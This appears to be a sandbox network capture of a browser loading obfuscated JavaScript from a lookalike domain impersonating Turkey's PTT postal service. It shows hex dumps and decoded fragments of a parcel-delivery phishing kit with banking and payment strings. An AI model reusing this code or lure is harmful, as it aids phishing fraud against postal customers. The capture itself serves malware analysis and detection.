    2024-09-01 22:28:25 UTC1369INData Raw: 72 5f 6f 64 65 6d 65 6c 65 27 2c 27 6f 48 69 7a 6d 65 74 6c 65 72 27 2c 27 72 2f 4b 61 72 67 6f 2e 61 73 27 2c 27 4e 30 61 57 31 68 5a 32 55 74 27 2c 27 74 4d 61 6e 61 67 65 72 5f 53 27 2c 27 72 74 5f 69 73 6c 65 6d 6c 65 27 2c 27 69 74 79 43 6f 6e 74 65 6e 74 27 2c 27 38 76 64 33 64 33 4c 6e 42 30 27 2c 27 75 72 75 6c 61 72 27 2c 27 61 72 2f 42 61 6e 6b 61 2f 48 27 2c 27 63 74 6c 30 30 5f 67 5f 64 37 27 2c 27 65 72 69 5c 78 32 30 3c 2f 61 3e 3c 61 27 2c 27 61 48 69 7a 6d 65 74 6c 65 72 27 2c 27 41 6e 6c 61 c5 9f 6d 61 6c c4 b1 5c 78 32 30 27 2c 27 57 65 73 74 65 72 6e 5c 78 32 30 55 6e 27 2c 27 79 75 72 74 5f 69 63 69 5f 70 27 2c 27 5f 6d 61 64 64 65 6c 65 72 69 27 2c 27 52 30 4c 58 42 79 62 32 52 31 27 2c 27 65 6d 5f 70 74 74 5f 6e 61 6b 27 2c 27 5a 6a
    Data Ascii: r_odemele','oHizmetler','r/Kargo.as','N0aW1hZ2Ut','tManager_S','rt_islemle','ityContent','8vd3d3LnB0','urular','ar/Banka/H','ctl00_g_d7','eri\x20</a><a','aHizmetler','Anlamal\x20','Western\x20Un','yurt_ici_p','_maddeleri','R0LXByb2R1','em_ptt_nak','Zj
    2024-09-01 22:28:25 UTC1369INData Raw: 73 5f 6b 61 67 69 74 6c 61 27 2c 27 73 61 70 5c 78 32 30 c4 b0 c5 9f 6c 65 6d 6c 27 2c 27 72 72 65 72 5c 78 32 32 3e 65 2d 46 69 27 2c 27 2d 6d 64 2d 34 5c 78 32 32 3e 3c 61 5c 78 32 30 27 2c 27 64 6c 59 6d 39 69 61 6c 39 77 27 2c 27 61 6e 6b 61 73 69 5f 73 69 6b 27 2c 27 4d 57 4d 33 4d 56 38 30 59 7a 27 2c 27 64 33 64 79 35 69 64 47 73 75 27 2c 27 62 6f 78 2d 73 68 61 64 6f 77 27 2c 27 53 2e 61 73 70 78 5c 78 32 32 3e 48 47 27 2c 27 49 48 4e 79 59 7a 30 69 61 48 27 2c 27 65 6d 5f 70 74 74 5f 6d 61 6c 27 2c 27 4c 6f 67 6f 6c 61 72 c4 b1 6d c4 b1 27 2c 27 61 76 5f 66 6f 6f 74 65 72 6d 27 2c 27 50 6f 73 74 61 2f 54 65 62 6c 27 2c 27 59 43 5a 67 39 6b 46 67 49 43 27 2c 27 74 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 27 2c 27 74 74 5f 62 69 6c 67
    Data Ascii: s_kagitla','sap\x20leml','rrer\x22>e-Fi','-md-4\x22><a\x20','dlYm9ial9w','ankasi_sik','MWM3MV80Yz','d3dy5idGsu','box-shadow','S.aspx\x22>HG','IHNyYz0iaH','em_ptt_mal','Logolarm','av_footerm','Posta/Tebl','YCZg9kFgIC','t\x22\x20class=\x22','tt_bilg
    2024-09-01 22:28:25 UTC1369INData Raw: 4a 76 63 32 39 6d 27 2c 27 47 4f 5c 78 32 30 48 c4 b0 5a 4d 45 54 4c 27 2c 27 67 69 49 48 52 68 63 6d 64 6c 27 2c 27 78 30 64 58 4a 6c 50 57 35 6c 27 2c 27 61 5f 6b 61 72 74 69 27 2c 27 54 61 72 69 68 c3 a7 65 5c 78 32 30 27 2c 27 61 74 6c 61 72 69 27 2c 27 74 5f 61 63 73 68 62 5f 6f 64 27 2c 27 5c 78 32 32 6e 6f 6f 70 65 6e 65 72 5c 78 32 30 27 2c 27 65 6e 75 5c 78 32 30 73 6d 2d 6e 6f 77 27 2c 27 46 6a 61 47 31 6c 62 6e 52 7a 27 2c 27 63 33 52 7a 4c 30 5a 68 65 57 27 2c 27 68 43 68 61 6e 67 65 28 29 3b 27 2c 27 79 61 6c 5f 73 6f 72 75 6d 6c 27 2c 27 59 75 64 48 49 76 54 47 6c 7a 27 2c 27 61 70 73 65 27 2c 27 34 2d 6e 6f 74 64 6c 67 5c 78 32 30 6e 27 2c 27 65 72 69 2e 61 73 70 78 23 65 27 2c 27 61 72 67 6f 2f 50 74 74 59 75 27 2c 27 45 67 59 32 39 73 4c
    Data Ascii: Jvc29m','GO\x20HZMETL','giIHRhcmdl','x0dXJlPW5l','a_karti','Tarihe\x20','atlari','t_acshb_od','\x22noopener\x20','enu\x20sm-now','FjaG1lbnRz','c3RzL0ZheW','hChange();','yal_soruml','YudHIvTGlz','apse','4-notdlg\x20n','eri.aspx#e','argo/PttYu','EgY29sL


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    27192.168.2.449771104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:25 UTC364OUTGET /help/assets/c27b6911JxKnW.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:25 UTC753INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:25 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:44 GMT
    ETag: W/"764-18fc3d84e20"
    CF-Cache-Status: HIT
    Age: 185
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6SH0EFF9xgyVF%2F80VIqGQsrTXfroP%2BBgNQeCX8DSYqCjXEAwh8eFxBFNTGmabYS1OEUmifefsAdTWr1uoVzaNOq45NshUGqerFNmgypX6lPa6wnkHFcOm5DmQ0ApOSI%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b17baa224282-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:25 UTC616INData Raw: 37 36 34 0d 0a 66 75 6e 63 74 69 6f 6e 20 61 32 34 5f 30 78 35 33 34 36 28 5f 30 78 34 30 33 30 63 35 2c 5f 30 78 33 31 65 65 63 64 29 7b 63 6f 6e 73 74 20 5f 30 78 35 35 36 38 32 35 3d 61 32 34 5f 30 78 33 32 34 62 28 29 3b 72 65 74 75 72 6e 20 61 32 34 5f 30 78 35 33 34 36 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 62 30 64 65 37 2c 5f 30 78 63 65 30 63 62 32 29 7b 5f 30 78 33 62 30 64 65 37 3d 5f 30 78 33 62 30 64 65 37 2d 30 78 36 37 3b 6c 65 74 20 5f 30 78 33 32 34 62 64 62 3d 5f 30 78 35 35 36 38 32 35 5b 5f 30 78 33 62 30 64 65 37 5d 3b 72 65 74 75 72 6e 20 5f 30 78 33 32 34 62 64 62 3b 7d 2c 61 32 34 5f 30 78 35 33 34 36 28 5f 30 78 34 30 33 30 63 35 2c 5f 30 78 33 31 65 65 63 64 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 32 34 5f 30 78 33 32 34 62 28
    Data Ascii: 764function a24_0x5346(_0x4030c5,_0x31eecd){const _0x556825=a24_0x324b();return a24_0x5346=function(_0x3b0de7,_0xce0cb2){_0x3b0de7=_0x3b0de7-0x67;let _0x324bdb=_0x556825[_0x3b0de7];return _0x324bdb;},a24_0x5346(_0x4030c5,_0x31eecd);}function a24_0x324b(
    2024-09-01 22:28:25 UTC1283INData Raw: 32 39 30 37 66 66 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 34 62 32 63 39 63 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 36 62 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 37 32 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 37 36 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 36 64 29 29 2f 30 78 34 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 37 34 29 29 2f 30 78 35 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 36 39 29 29 2f 30 78 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 36 66 29 29 2f
    Data Ascii: 2907ff();while(!![]){try{const _0x4b2c9c=parseInt(_0x4680c9(0x6b))/0x1*(-parseInt(_0x4680c9(0x72))/0x2)+parseInt(_0x4680c9(0x76))/0x3+-parseInt(_0x4680c9(0x6d))/0x4*(parseInt(_0x4680c9(0x74))/0x5)+parseInt(_0x4680c9(0x69))/0x6*(-parseInt(_0x4680c9(0x6f))/
    2024-09-01 22:28:25 UTC5INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    28192.168.2.449772104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:25 UTC364OUTGET /help/assets/cbcdcea5JxKnW.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:25 UTC764INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:25 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:44 GMT
    ETag: W/"17d2-18fc3d84e20"
    CF-Cache-Status: HIT
    Age: 185
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jKCA%2FL%2BQm3y%2FZ8jmgIAaN8ZvEHkG7%2FZ3KNXZqos8knsYczpIxt35yLso6taY8wiUWR3em6SyHKOLSD7SceqAlRU3lw1D7qapS79lkh%2FYLB%2FJ96NE993JcqB%2FzYVcPxg%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b17bad4c1815-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:25 UTC605INData Raw: 31 37 64 32 0d 0a 63 6f 6e 73 74 20 61 32 36 5f 30 78 32 66 36 62 32 65 3d 61 32 36 5f 30 78 32 31 39 35 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 62 32 36 64 35 2c 5f 30 78 35 38 66 37 30 33 29 7b 63 6f 6e 73 74 20 5f 30 78 35 35 62 61 30 32 3d 61 32 36 5f 30 78 32 31 39 35 2c 5f 30 78 35 36 65 64 31 35 3d 5f 30 78 34 62 32 36 64 35 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 63 32 66 33 33 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61 30 32 28 30 78 31 36 33 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61 30 32 28 30 78 31 39 61 29 29 2f 30 78 32 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61 30 32 28 30 78 31 36 30 29 29 2f 30 78 33 29 2b 70 61 72 73 65 49 6e 74 28 5f
    Data Ascii: 17d2const a26_0x2f6b2e=a26_0x2195;(function(_0x4b26d5,_0x58f703){const _0x55ba02=a26_0x2195,_0x56ed15=_0x4b26d5();while(!![]){try{const _0x1c2f33=-parseInt(_0x55ba02(0x163))/0x1+-parseInt(_0x55ba02(0x19a))/0x2*(parseInt(_0x55ba02(0x160))/0x3)+parseInt(_
    2024-09-01 22:28:25 UTC1369INData Raw: 30 78 35 32 33 39 37 39 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 5f 30 78 31 61 63 66 39 39 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 64 33 32 31 39 2c 5f 30 78 32 30 32 37 63 33 29 7b 63 6f 6e 73 74 20 5f 30 78 32 34 61 35 30 35 3d 5f 30 78 31 61 63 66 39 39 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 32 34 38 63 66 38 3d 61 32 36 5f 30 78 32 31 39 35 3b 69 66 28 5f 30 78 32 30 32 37 63 33 29 7b 63 6f 6e 73 74 20 5f 30 78 36 32 36 65 34 32 3d 5f 30 78 32 30 32 37 63 33 5b 5f 30 78 32 34 38 63 66 38 28 30 78 31 38 65 29 5d 28 5f 30 78 32 64 33 32 31 39 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 32 30 32 37 63 33 3d 6e 75 6c 6c 2c 5f 30 78 36 32 36 65 34 32 3b 7d 7d 3a
    Data Ascii: 0x523979=(function(){let _0x1acf99=!![];return function(_0x2d3219,_0x2027c3){const _0x24a505=_0x1acf99?function(){const _0x248cf8=a26_0x2195;if(_0x2027c3){const _0x626e42=_0x2027c3[_0x248cf8(0x18e)](_0x2d3219,arguments);return _0x2027c3=null,_0x626e42;}}:
    2024-09-01 22:28:25 UTC1369INData Raw: 43 6f 6e 74 69 6e 75 65 27 2c 27 74 6f 53 74 72 69 6e 67 27 2c 27 6e 6f 74 69 63 65 4c 69 73 74 27 2c 27 37 32 34 37 36 53 58 42 43 6f 4a 27 2c 27 74 72 61 63 6b 54 69 74 6c 65 27 2c 27 5c 78 32 30 2a 64 61 74 65 2a 5c 78 32 30 5c 78 32 37 64 27 2c 27 59 6f 75 72 5c 78 32 30 70 61 63 6b 61 27 2c 27 6e 65 78 74 27 2c 27 61 74 65 5c 78 32 30 79 6f 75 72 5c 78 32 30 61 27 2c 27 44 65 6c 69 76 65 72 79 5c 78 32 30 46 27 2c 27 73 65 61 72 63 68 27 2c 27 50 61 6b 65 74 5c 78 32 30 4e 75 6d 61 27 2c 27 39 30 36 33 37 34 37 67 64 56 4a 59 42 27 2c 27 31 37 33 38 32 39 36 6b 66 66 66 4e 72 27 2c 27 75 6d 75 27 2c 27 5c 78 32 30 61 67 61 69 6e 5c 78 32 30 6f 6e 5c 78 32 30 27 2c 27 70 72 65 76 65 6e 74 27 2c 27 4c c3 bc 74 66 65 6e 5c 78 32 30 61 64 72 27 2c 27 72
    Data Ascii: Continue','toString','noticeList','72476SXBCoJ','trackTitle','\x20*date*\x20\x27d','Your\x20packa','next','ate\x20your\x20a','Delivery\x20F','search','Paket\x20Numa','9063747gdVJYB','1738296kfffNr','umu','\x20again\x20on\x20','prevent','Ltfen\x20adr','r
    2024-09-01 22:28:25 UTC1369INData Raw: 28 30 78 31 36 38 29 2b 27 69 6e 67 5c 78 32 30 6e 75 6d 62 65 72 27 2b 61 32 36 5f 30 78 32 66 36 62 32 65 28 30 78 31 61 63 29 7d 2c 27 6e 6f 74 69 63 65 27 3a 7b 27 64 65 66 61 75 6c 74 27 3a 61 32 36 5f 30 78 32 66 36 62 32 65 28 30 78 31 38 32 29 2b 61 32 36 5f 30 78 32 66 36 62 32 65 28 30 78 31 36 35 29 2b 61 32 36 5f 30 78 32 66 36 62 32 65 28 30 78 31 37 35 29 7d 2c 27 6e 6f 74 69 63 65 4c 69 73 74 27 3a 7b 27 64 65 66 61 75 6c 74 27 28 29 7b 63 6f 6e 73 74 20 5f 30 78 35 37 63 32 32 65 3d 61 32 36 5f 30 78 32 66 36 62 32 65 3b 72 65 74 75 72 6e 5b 27 59 6f 75 72 5c 78 32 30 70 61 63 6b 61 27 2b 5f 30 78 35 37 63 32 32 65 28 30 78 31 61 34 29 2b 5f 30 78 35 37 63 32 32 65 28 30 78 31 39 34 29 2b 5f 30 78 35 37 63 32 32 65 28 30 78 31 39 62 29 2b
    Data Ascii: (0x168)+'ing\x20number'+a26_0x2f6b2e(0x1ac)},'notice':{'default':a26_0x2f6b2e(0x182)+a26_0x2f6b2e(0x165)+a26_0x2f6b2e(0x175)},'noticeList':{'default'(){const _0x57c22e=a26_0x2f6b2e;return['Your\x20packa'+_0x57c22e(0x1a4)+_0x57c22e(0x194)+_0x57c22e(0x19b)+
    2024-09-01 22:28:25 UTC1369INData Raw: 31 38 39 29 5d 29 7d 2c 5b 65 28 27 68 31 27 2c 44 2c 61 32 36 5f 30 78 31 64 34 63 66 30 28 5f 30 78 34 32 33 35 34 39 5b 5f 30 78 34 39 31 31 38 66 28 30 78 31 61 37 29 5d 29 2c 30 78 31 29 2c 49 2c 65 28 5f 30 78 34 39 31 31 38 66 28 30 78 31 61 32 29 2c 7a 2c 5b 65 28 27 70 27 2c 6e 75 6c 6c 2c 61 32 36 5f 30 78 31 64 34 63 66 30 28 5f 30 78 34 32 33 35 34 39 5b 5f 30 78 34 39 31 31 38 66 28 30 78 31 37 64 29 5d 5b 5f 30 78 34 39 31 31 38 66 28 30 78 31 39 35 29 5d 28 5f 30 78 34 39 31 31 38 66 28 30 78 31 36 61 29 2c 75 28 5f 30 78 31 39 65 39 30 61 29 29 29 2c 30 78 31 29 2c 65 28 27 70 27 2c 77 2c 5b 65 28 27 62 27 2c 6e 75 6c 6c 2c 61 32 36 5f 30 78 31 64 34 63 66 30 28 5f 30 78 34 32 33 35 34 39 5b 5f 30 78 34 39 31 31 38 66 28 30 78 31 37 34 29
    Data Ascii: 189)])},[e('h1',D,a26_0x1d4cf0(_0x423549[_0x49118f(0x1a7)]),0x1),I,e(_0x49118f(0x1a2),z,[e('p',null,a26_0x1d4cf0(_0x423549[_0x49118f(0x17d)][_0x49118f(0x195)](_0x49118f(0x16a),u(_0x19e90a))),0x1),e('p',w,[e('b',null,a26_0x1d4cf0(_0x423549[_0x49118f(0x174)
    2024-09-01 22:28:25 UTC25INData Raw: 29 3b 65 78 70 6f 72 74 7b 47 20 61 73 20 64 65 66 61 75 6c 74 7d 3b 0d 0a
    Data Ascii: );export{G as default};
    2024-09-01 22:28:25 UTC5INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    29192.168.2.449773104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:25 UTC532OUTGET /help/assets/0e738ae1JxKnW.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://pttgovnv.top
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:25 UTC763INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:25 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:42 GMT
    ETag: W/"1b7a6-18fc3d84650"
    CF-Cache-Status: HIT
    Age: 36414
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W9k%2Bjq46Hg7N4vTRms7HEZSAMsskhKIgDi0uYfpEvcKUMT2%2BSIXoKJoJ%2Bnwj8n1XSeKgLXDvE%2F2YXyG61vjCReK5YAUPBfJIaMqStMnZdW5alF03gbukWpGOs4%2BJPZg%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b17c2df61799-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:25 UTC606INData Raw: 37 63 62 34 0d 0a 63 6f 6e 73 74 20 61 31 5f 30 78 35 34 31 34 36 61 3d 61 31 5f 30 78 31 61 33 33 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 35 30 31 39 61 2c 5f 30 78 34 62 64 31 65 66 29 7b 63 6f 6e 73 74 20 5f 30 78 34 61 64 31 34 66 3d 61 31 5f 30 78 31 61 33 33 2c 5f 30 78 34 66 30 39 64 66 3d 5f 30 78 31 35 30 31 39 61 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 32 33 61 65 64 36 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 31 34 66 28 30 78 31 63 30 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 31 34 66 28 30 78 31 64 32 29 29 2f 30 78 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 31 34 66 28 30 78 31 65 31 29 29 2f 30 78 33 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78
    Data Ascii: 7cb4const a1_0x54146a=a1_0x1a33;(function(_0x15019a,_0x4bd1ef){const _0x4ad14f=a1_0x1a33,_0x4f09df=_0x15019a();while(!![]){try{const _0x23aed6=parseInt(_0x4ad14f(0x1c0))/0x1*(-parseInt(_0x4ad14f(0x1d2))/0x2)+-parseInt(_0x4ad14f(0x1e1))/0x3*(parseInt(_0x
    2024-09-01 22:28:25 UTC1369INData Raw: 37 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 5f 30 78 32 64 30 33 63 33 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 37 64 66 66 39 63 2c 5f 30 78 35 32 65 33 63 38 29 7b 63 6f 6e 73 74 20 5f 30 78 33 64 32 39 37 63 3d 5f 30 78 32 64 30 33 63 33 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 31 35 33 30 37 31 3d 61 31 5f 30 78 31 61 33 33 3b 69 66 28 5f 30 78 35 32 65 33 63 38 29 7b 63 6f 6e 73 74 20 5f 30 78 33 33 32 37 36 66 3d 5f 30 78 35 32 65 33 63 38 5b 5f 30 78 31 35 33 30 37 31 28 30 78 33 36 64 29 5d 28 5f 30 78 37 64 66 66 39 63 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 35 32 65 33 63 38 3d 6e 75 6c 6c 2c 5f 30 78 33 33 32 37 36 66 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e
    Data Ascii: 7=(function(){let _0x2d03c3=!![];return function(_0x7dff9c,_0x52e3c8){const _0x3d297c=_0x2d03c3?function(){const _0x153071=a1_0x1a33;if(_0x52e3c8){const _0x33276f=_0x52e3c8[_0x153071(0x36d)](_0x7dff9c,arguments);return _0x52e3c8=null,_0x33276f;}}:function
    2024-09-01 22:28:25 UTC1369INData Raw: 38 37 29 2c 52 65 3d 5f 30 78 32 31 35 61 66 64 3d 3e 74 79 70 65 6f 66 20 41 72 72 61 79 42 75 66 66 65 72 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 33 31 64 29 5d 3d 3d 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 33 38 37 29 3f 41 72 72 61 79 42 75 66 66 65 72 5b 27 69 73 56 69 65 77 27 5d 28 5f 30 78 32 31 35 61 66 64 29 3a 5f 30 78 32 31 35 61 66 64 26 26 5f 30 78 32 31 35 61 66 64 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 31 36 32 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 42 75 66 66 65 72 2c 65 65 3d 28 7b 74 79 70 65 3a 5f 30 78 32 64 38 37 61 62 2c 64 61 74 61 3a 5f 30 78 33 62 36 30 65 31 7d 2c 5f 30 78 34 64 30 35 38 31 2c 5f 30 78 34 36 62 61 62 32 29 3d 3e 41 65 26 26 5f 30 78 33 62 36 30 65 31 20 69 6e 73 74 61 6e 63 65 6f 66
    Data Ascii: 87),Re=_0x215afd=>typeof ArrayBuffer[a1_0x54146a(0x31d)]==a1_0x54146a(0x387)?ArrayBuffer['isView'](_0x215afd):_0x215afd&&_0x215afd[a1_0x54146a(0x162)]instanceof ArrayBuffer,ee=({type:_0x2d87ab,data:_0x3b60e1},_0x4d0581,_0x46bab2)=>Ae&&_0x3b60e1 instanceof
    2024-09-01 22:28:25 UTC1369INData Raw: 65 29 5d 29 29 3b 65 65 28 5f 30 78 31 66 38 37 32 35 2c 21 30 78 31 2c 5f 30 78 35 31 33 35 39 65 3d 3e 7b 24 7c 7c 28 24 3d 6e 65 77 20 54 65 78 74 45 6e 63 6f 64 65 72 28 29 29 2c 5f 30 78 33 64 37 33 35 34 28 24 5b 27 65 6e 63 6f 64 65 27 5d 28 5f 30 78 35 31 33 35 39 65 29 29 3b 7d 29 3b 7d 63 6f 6e 73 74 20 75 65 3d 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 61 34 29 2b 27 4b 4c 4d 4e 4f 50 51 52 53 54 27 2b 27 55 56 57 58 59 5a 61 62 63 64 27 2b 27 65 66 67 68 69 6a 6b 6c 6d 6e 27 2b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 62 61 29 2b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 33 62 29 2b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 31 32 29 2c 78 3d 74 79 70 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 3e 27 75 27 3f 5b 5d 3a 6e 65 77 20 55
    Data Ascii: e)]));ee(_0x1f8725,!0x1,_0x51359e=>{$||($=new TextEncoder()),_0x3d7354($['encode'](_0x51359e));});}const ue=a1_0x54146a(0x2a4)+'KLMNOPQRST'+'UVWXYZabcd'+'efghijklmn'+a1_0x54146a(0x2ba)+a1_0x54146a(0x23b)+a1_0x54146a(0x212),x=typeof Uint8Array>'u'?[]:new U
    2024-09-01 22:28:25 UTC1369INData Raw: 74 61 27 3a 43 65 28 5f 30 78 33 36 61 39 39 62 2c 5f 30 78 37 62 62 31 33 33 29 7d 3b 63 6f 6e 73 74 20 5f 30 78 37 31 36 30 31 36 3d 5f 30 78 33 36 61 39 39 62 5b 5f 30 78 31 37 65 38 35 30 28 30 78 33 32 32 29 5d 28 30 78 30 29 3b 72 65 74 75 72 6e 20 5f 30 78 37 31 36 30 31 36 3d 3d 3d 27 62 27 3f 7b 27 74 79 70 65 27 3a 27 6d 65 73 73 61 67 65 27 2c 27 64 61 74 61 27 3a 4b 65 28 5f 30 78 33 36 61 39 39 62 5b 27 73 75 62 73 74 72 69 6e 67 27 5d 28 30 78 31 29 2c 5f 30 78 37 62 62 31 33 33 29 7d 3a 49 5b 5f 30 78 37 31 36 30 31 36 5d 3f 5f 30 78 33 36 61 39 39 62 5b 5f 30 78 31 37 65 38 35 30 28 30 78 33 31 34 29 5d 3e 30 78 31 3f 7b 27 74 79 70 65 27 3a 49 5b 5f 30 78 37 31 36 30 31 36 5d 2c 27 64 61 74 61 27 3a 5f 30 78 33 36 61 39 39 62 5b 27 73 75
    Data Ascii: ta':Ce(_0x36a99b,_0x7bb133)};const _0x716016=_0x36a99b[_0x17e850(0x322)](0x0);return _0x716016==='b'?{'type':'message','data':Ke(_0x36a99b['substring'](0x1),_0x7bb133)}:I[_0x716016]?_0x36a99b[_0x17e850(0x314)]>0x1?{'type':I[_0x716016],'data':_0x36a99b['su
    2024-09-01 22:28:25 UTC1369INData Raw: 30 78 31 30 37 34 36 65 28 30 78 33 36 39 29 29 62 72 65 61 6b 3b 7d 72 65 74 75 72 6e 20 5f 30 78 61 64 63 30 37 65 3b 7d 3b 66 75 6e 63 74 69 6f 6e 20 58 65 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 54 72 61 6e 73 66 6f 72 6d 53 74 72 65 61 6d 28 7b 27 74 72 61 6e 73 66 6f 72 6d 27 28 5f 30 78 33 63 63 34 66 31 2c 5f 30 78 34 63 30 31 38 39 29 7b 48 65 28 5f 30 78 33 63 63 34 66 31 2c 5f 30 78 34 37 33 36 35 38 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 34 37 34 65 65 37 3d 61 31 5f 30 78 31 61 33 33 2c 5f 30 78 34 31 36 37 31 30 3d 5f 30 78 34 37 33 36 35 38 5b 5f 30 78 34 37 34 65 65 37 28 30 78 33 31 34 29 5d 3b 6c 65 74 20 5f 30 78 31 62 65 35 38 32 3b 69 66 28 5f 30 78 34 31 